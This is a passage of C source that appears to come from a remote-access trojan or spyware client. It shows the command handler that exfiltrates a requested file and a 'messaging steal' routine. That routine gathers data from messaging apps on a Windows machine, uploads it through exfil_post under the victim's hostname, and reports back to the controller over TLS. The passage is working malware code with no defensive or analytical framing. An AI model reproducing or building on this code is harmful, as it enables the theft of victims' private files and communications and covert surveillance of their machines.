                const char *fname = strrchr(path, '\\');
                fname = fname ? fname + 1 : path;
                exfil_post(hostname, fname, data, len);
                free(data);
                char ack[128];
                _snprintf(ack, sizeof(ack), "exfiltrated '%s' (%d bytes)", fname, len);
                Packet resp = {COMMAND_RESPONSE, pkt->request_id, (int)strlen(ack), ack};
                locked_send(&resp, conn);
            } else {
                char *err = "failed to read file";
                Packet resp = {COMMAND_ERROR, pkt->request_id, (int)strlen(err), err};
                locked_send(&resp, conn);
            }
#endif
            break;
        }

        case COMMAND_MESSAGING_STEAL: {
            int len = 0;
            char *data = spy_messaging_steal(&len);
#ifdef _WIN32
            if (data) {
                char hostname[MAX_COMPUTERNAME_LENGTH + 1] = {0};
                DWORD hn_len = sizeof(hostname);
                GetComputerNameA(hostname, &hn_len);
                char filename[128];
                _snprintf(filename, sizeof(filename), "messaging_%ld.bin", (long)time(NULL));
                exfil_post(hostname, filename, data, len);
                free(data);
                char *ack = "messaging data exfiltrated";
                Packet resp = {COMMAND_RESPONSE, pkt->request_id, (int)strlen(ack), ack};
                locked_send(&resp, conn);
            } else {
                char *err = "messaging steal failed (no apps found or access denied)";
                Packet resp = {COMMAND_ERROR, pkt->request_id, (int)strlen(err), err};
                locked_send(&resp, conn);
            }
#endif
            break;
        }

        default:
            break;
        }

        free_packet(pkt);
    }

    /* Signal keepalive thread to stop and give it one cycle to observe the
     * flag before we free the connection it holds a pointer to. */
    g_ka_run = 0;
    SLEEP(1);
    g_conn = NULL;
    if (conn) tls_conn_free(conn);
    tls_cleanup();
    MUTEX_DESTROY(&g_write_lock);
    platform_cleanup();
#ifdef _WIN32
    ExitProcess(0);
#endif
    return 0;
}
